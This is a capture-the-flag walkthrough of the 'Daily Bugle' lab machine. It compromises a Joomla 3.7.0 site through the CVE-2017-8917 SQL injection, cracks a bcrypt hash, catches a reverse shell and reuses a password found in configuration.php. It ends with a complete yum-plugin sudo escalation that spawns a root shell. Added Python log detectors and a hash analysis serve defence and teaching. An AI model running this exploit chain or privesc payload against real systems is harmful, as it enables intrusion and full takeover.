Daily Bugle

Recon
Let's kick off the nmap scan and, since we know this machine is running a website, visit the web page in a browser while the scan is running.
$ nmap -A -T4 -oN dailybugle.nmap.txt 10.10.185.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-27 12:51 EDT
Nmap scan report for 10.10.185.129
Host is up (0.081s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open  mysql   MariaDB (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.51 seconds

Note:
- MySQL (MariaDB) on port 3306
- Apache 2.4.6 on port 80, running a Joomla site
- Also note the list of directories disallowed in robots.txt
Enumeration
If you do not already have it, clone the joomscan script to enumerate the Joomla site:
git clone https://github.com/rezasp/joomscan.git
$ perl ./joomscan.pl --url=http://10.10.185.129 -jv

Processing http://10.10.185.129 ...

[+] Detecting Joomla Version
[++] Joomla 3.7.0

Your Report : reports/10.10.185.129/
The full report looks like this:
 (1337.today)

 --=[OWASP JoomScan
 +---++---==[Version : 0.0.7
 +---++---==[Update Date : [2018/09/23]
 +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
 --=[Code name : Self Challenge
 @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://10.10.185.129 ...

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://10.10.185.129/administrator/components
http://10.10.185.129/administrator/modules
http://10.10.185.129/administrator/templates
http://10.10.185.129/images/banners

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://10.10.185.129/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://10.10.185.129/robots.txt

Interesting path found from robots.txt
http://10.10.185.129/joomla/administrator/
http://10.10.185.129/administrator/
http://10.10.185.129/bin/
http://10.10.185.129/cache/
http://10.10.185.129/cli/
http://10.10.185.129/components/
http://10.10.185.129/includes/
http://10.10.185.129/installation/
http://10.10.185.129/language/
http://10.10.185.129/layouts/
http://10.10.185.129/libraries/
http://10.10.185.129/logs/
http://10.10.185.129/modules/
http://10.10.185.129/plugins/
http://10.10.185.129/tmp/

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found

Your Report : reports/10.10.185.129/

Let's search for known vulnerabilities in Joomla 3.7.0:
$ searchsploit joomla 3.7.0
-------------------------------------------------------------- ---------------------------
 Exploit Title                                                | Path
-------------------------------------------------------------- ---------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                    | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt
-------------------------------------------------------------- ---------------------------
Shellcodes: No Results

Looks like this version is vulnerable to SQL injection.
$ head -10 /usr/share/exploitdb/exploits/php/webapps/42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
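From the defending side, the request pattern behind CVE-2017-8917 is easy to spot in the web server log: it rides on the `list[fullordering]` sort parameter of the com_fields component (the parameter named in the Sucuri advisory referenced above), and a legitimate sort value is only ever "<alias>.<column> ASC|DESC". The Python below is an added example, not part of this writeup or of any exploit script; it parses Apache combined-log lines and flags com_fields requests whose ordering value does not fit that shape. The log lines are constructed for illustration and the function names are mine. The upstream fix was the Joomla 3.7.1 release.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-log lines for illustration; none come from the box.
# Line 1 is a normal sort request; lines 3 and 4 carry ordering values that are
# not a plain "<alias>.<column> ASC|DESC" and should be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Sep/2020:12:55:01 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.title+ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [27/Sep/2020:12:55:02 -0400] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Sep/2020:12:56:40 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.id%2C(SELECT%201) HTTP/1.1" 500 421 "-" "python-requests/2.24"
10.0.0.9 - - [27/Sep/2020:12:56:41 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.id%27 HTTP/1.1" 500 421 "-" "python-requests/2.24"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Joomla's own sort widget only ever sends "<alias>.<column> ASC|DESC".
SAFE_ORDERING_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]* (ASC|DESC)$', re.IGNORECASE)

def parse_line(line):
    """Split one combined-log line into its fields; return None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlparse(m.group("target"))
    # parse_qs URL-decodes keys and values, so list%5Bfullordering%5D becomes list[fullordering]
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "path": url.path,
        "query": parse_qs(url.query, keep_blank_values=True),
    }

def suspicious_ordering(entry):
    """Return the offending list[fullordering] value of a com_fields request, else None."""
    qs = entry["query"]
    if qs.get("option") != ["com_fields"]:
        return None
    for value in qs.get("list[fullordering]", []):
        if not SAFE_ORDERING_RE.match(value):
            return value
    return None

def scan_log(text):
    """Return (ip, timestamp, offending value) for every flagged request in the log text."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        bad = suspicious_ordering(entry)
        if bad is not None:
            hits.append((entry["ip"], entry["ts"], bad))
    return hits

if __name__ == "__main__":
    for ip, ts, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious com_fields ordering: {value!r}")
```

The allowlist approach is deliberate: matching on SQL keywords misses encoded or unusual payloads, whereas anything that is not a plain column sort has no business in that parameter. Run it over a real access log with `scan_log(open("access_log").read())`.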
Exploit
Searching GitHub for CVE-2017-8917 turned up the joomblah script at https://github.com/stefanlucas/Exploit-Joomla/blob/master/joomblah.py

$ python ./joomblah.py http://10.10.23.102

 [-] Fetching CSRF token
 [-] Testing SQLi
 - Found table: fb9j5_users
 - Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jonah', '[email protected]', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
 - Extracting sessions from fb9j5_session

Looks like we found a user called "jonah" and their password hash.
Using hashcat, we can crack the hash. I passed the hash mode as 3200 because the hash looks a lot like the bcrypt, Blowfish (Unix) example on this page: https://hashcat.net/wiki/doku.php?id=example_hashes (the $2y$ prefix gives it away).
# hashcat -m 3200 ./jonah-password.txt /usr/share/wordlists/rockyou.txt

Session..........: hashcat
Status...........: Running
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p...BtZutm
Time.Started.....: Sun Sep 27 17:13:14 2020 (13 mins, 7 secs)
Time.Estimated...: Thu Oct 1 07:41:12 2020 (3 days, 14 hours)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 46 H/s (11.09ms) @ Accel:4 Loops:64 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests
Progress.........: 36328/14344385 (0.25%)
Rejected.........: 0/36328 (0.00%)
Restore.Point....: 36328/14344385 (0.25%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:512-576
Candidates.#1....: Kathleen -> Dominic

$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm:XXXXXXXXXX

Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p...BtZutm
Time.Started.....: Sun Sep 27 17:13:14 2020 (16 mins, 54 secs)
Time.Estimated...: Sun Sep 27 17:30:08 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 46 H/s (10.71ms) @ Accel:4 Loops:64 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 46840/14344385 (0.33%)
Rejected.........: 0/46840 (0.00%)
Restore.Point....: 46832/14344385 (0.33%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:960-1024
Candidates.#1....: staffy -> sorriso

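The prefix check done by eye above can be made precise. As an added example (not from the original writeup), the Python below parses a bcrypt modular-crypt string, validates its cost, and turns the numbers hashcat printed on this page (46 H/s, 14,344,385 rockyou candidates) into the exhaustion time hashcat estimated; the rate-scaling helper assumes the standard bcrypt property that each cost increment doubles the work. Function names such as parse_bcrypt and rate_at_cost are mine.

```python
import re
from datetime import timedelta

# Hash recovered from the fb9j5_users table on the page (the plaintext is not needed here).
JONAH_HASH = "$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm"

# Figures printed by hashcat on the page: wordlist size and measured rate at cost 10.
ROCKYOU_CANDIDATES = 14344385
MEASURED_RATE_HS = 46

# bcrypt modular-crypt format: $2<variant>$<cost>$<22-char salt><31-char digest>,
# salt and digest in bcrypt's own base64 alphabet (./A-Za-z0-9).
BCRYPT_RE = re.compile(
    r'^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$'
    r'(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$'
)

def parse_bcrypt(hash_string):
    """Validate a bcrypt string and return its parts; the $2y$ prefix is what identifies mode 3200."""
    m = BCRYPT_RE.match(hash_string)
    if m is None:
        raise ValueError("not a bcrypt modular-crypt string")
    cost = int(m.group("cost"))
    if not 4 <= cost <= 31:
        raise ValueError(f"bcrypt cost {cost} out of range 4..31")
    return {
        "variant": m.group("variant"),
        "cost": cost,
        "rounds": 2 ** cost,      # key-setup iterations the cost parameter encodes
        "salt": m.group("salt"),
        "digest": m.group("digest"),
        "hashcat_mode": 3200,     # hashcat's mode for bcrypt $2*$
    }

def rate_at_cost(measured_rate, measured_cost, target_cost):
    """Scale a measured rate to another cost: every cost increment halves the rate."""
    return measured_rate / (2 ** (target_cost - measured_cost))

def exhaust_time(candidates, rate_per_second):
    """Worst-case time to try every candidate at the given rate."""
    return timedelta(seconds=candidates / rate_per_second)

if __name__ == "__main__":
    info = parse_bcrypt(JONAH_HASH)
    print(f"variant={info['variant']} cost={info['cost']} rounds={info['rounds']} hashcat mode={info['hashcat_mode']}")
    print("whole rockyou list at cost 10:", exhaust_time(ROCKYOU_CANDIDATES, MEASURED_RATE_HS))
    for cost in (10, 12, 14):
        rate = rate_at_cost(MEASURED_RATE_HS, info["cost"], cost)
        print(f"cost {cost}: {rate:.2f} H/s, rockyou takes {exhaust_time(ROCKYOU_CANDIDATES, rate)}")
```

Note that the full wordlist would have taken about 3 days 14 hours at this rate, matching hashcat's estimate, and the password fell after 46,840 guesses (about 17 minutes) only because it sat near the top of rockyou. A stronger password, not a stronger hash, is the real mitigation at cost 10; raising the cost buys a constant factor per increment.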
http://10.10.224.69/templates/protostar/shell.php?1601256492
$ nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.6.19.215] from (UNKNOWN) [10.10.224.69] 49000
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 21:32:05 up 30 min, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$
We can read /etc/passwd and notice that jonah's Linux account is probably jjameson. Then I found the password for the root user in the configuration.php file in /var/www/html (Joomla keeps its database credentials there).
sh-4.2$ pwd
/var/www/html
pwd
sh-4.2$ ls -l configuration.php
ls -l configuration.php
-rw-r--r-- 1 apache apache 1982 Dec 14 2019 configuration.php
sh-4.2$
You can try to SSH into the machine as root with this password (remember that SSH on port 22 is open), but it does not work. Trying jonah's account (jjameson) with the same password works.
$ ssh [email protected]
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Last failed login: Sun Sep 27 21:40:57 EDT 2020 from ip-10-6-19-215.eu-west-1.compute.internal on ssh:notty
There was 1 failed login attempt since the last successful login.
Last login: Mon Dec 16 05:14:55 2019 from netwars
[jjameson@dailybugle ~]$ cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[jjameson@dailybugle ~]$

$ scp linpeas.sh [email protected]:/tmp/
[email protected]'s password:
linpeas.sh 100% 288KB 666.1KB/s 00:00

Post-Exploitation/Privesc
Searched for possible ways to exploit the yum binary as a non-root user, since jjameson is allowed to run it through sudo. Here is how you can escalate privileges and capture the root flag: yum reads its plugin directory from whatever config file it is pointed at, so a config file and plugin in a temporary directory run as root.
[jjameson@dailybugle tmp]$ cd
[jjameson@dailybugle ~]$ TF=$(mktemp -d)
[jjameson@dailybugle ~]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# cat /root/root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
sh-4.2#
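A sudo rule that allows yum is effectively a root rule, so the durable fix is on the sudoers side; detection after the fact is the second line. As an added example (not from this writeup or from GTFOBins), the Python below scans sudo entries in the /var/log/secure format for yum runs that point -c/--config, or the pluginpath/pluginconfpath options the temporary config above sets, at directories outside /etc and /usr, or that enable a plugin from the command line. The log entries are constructed; yum's --setopt option is real, but the set of flagged options and the function names are my choices.

```python
import os
import re
import shlex

# Constructed /var/log/secure entries in the format sudo writes on CentOS 7; none are from the box.
# Line 2 mirrors the invocation shown above, line 3 redirects the plugin path through --setopt,
# and line 4 is an ordinary administrator run with the system config that should not fire.
SAMPLE_SECURE = """\
Sep 27 21:45:10 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/bin/yum check-update
Sep 27 21:50:01 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/bin/yum -c /tmp/tmp.Xk2aQ1/x --enableplugin=y
Sep 27 21:51:30 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/bin/yum --setopt=pluginpath=/home/jjameson/p install vim
Sep 27 21:52:00 dailybugle sudo:     root : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/bin/yum -c /etc/yum.conf update
"""

SUDO_RE = re.compile(
    r'^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sudo:\s+(?P<user>\S+) : '
    r'.*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$'
)

# Directories from which yum is expected to read configuration and plugins.
TRUSTED_PREFIXES = ("/etc/", "/usr/lib/", "/usr/share/")

def untrusted_path(path):
    """True when a config or plugin path resolves outside the trusted prefixes."""
    return not os.path.normpath(path).startswith(TRUSTED_PREFIXES)

def parse_sudo_line(line):
    """Return the fields of one sudo log entry, or None for unrelated lines."""
    m = SUDO_RE.match(line)
    if m is None:
        return None
    return {
        "ts": m.group("ts"),
        "host": m.group("host"),
        "user": m.group("user"),
        "target": m.group("target"),
        "argv": shlex.split(m.group("cmd")),
    }

def yum_abuse_indicators(argv):
    """List the reasons a yum command line looks like a config/plugin hijack (empty if none)."""
    reasons = []
    if not argv or os.path.basename(argv[0]) != "yum":
        return reasons
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg in ("-c", "--config") and i + 1 < len(argv):
            if untrusted_path(argv[i + 1]):
                reasons.append(f"config file outside trusted dirs: {argv[i + 1]}")
            i += 2
            continue
        if arg.startswith("--config="):
            path = arg.split("=", 1)[1]
            if untrusted_path(path):
                reasons.append(f"config file outside trusted dirs: {path}")
        elif arg.startswith("--setopt="):
            key, _, value = arg[len("--setopt="):].partition("=")
            if key in ("pluginpath", "pluginconfpath") and untrusted_path(value):
                reasons.append(f"{key} redirected to {value}")
        elif arg.startswith("--enableplugin"):
            reasons.append(f"plugin enabled from the command line: {arg}")
        i += 1
    return reasons

def scan_secure(text):
    """Return (timestamp, sudo user, reasons) for every flagged yum invocation."""
    hits = []
    for line in text.splitlines():
        entry = parse_sudo_line(line)
        if entry is None:
            continue
        reasons = yum_abuse_indicators(entry["argv"])
        if reasons:
            hits.append((entry["ts"], entry["user"], reasons))
    return hits

if __name__ == "__main__":
    for ts, user, reasons in scan_secure(SAMPLE_SECURE):
        print(f"{ts} {user}: " + "; ".join(reasons))
```

Paths are normalised before the prefix check so that a config path written as /etc/../tmp/x is still treated as untrusted.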
This is a great machine; I was able to solve it without any help and thoroughly enjoyed it.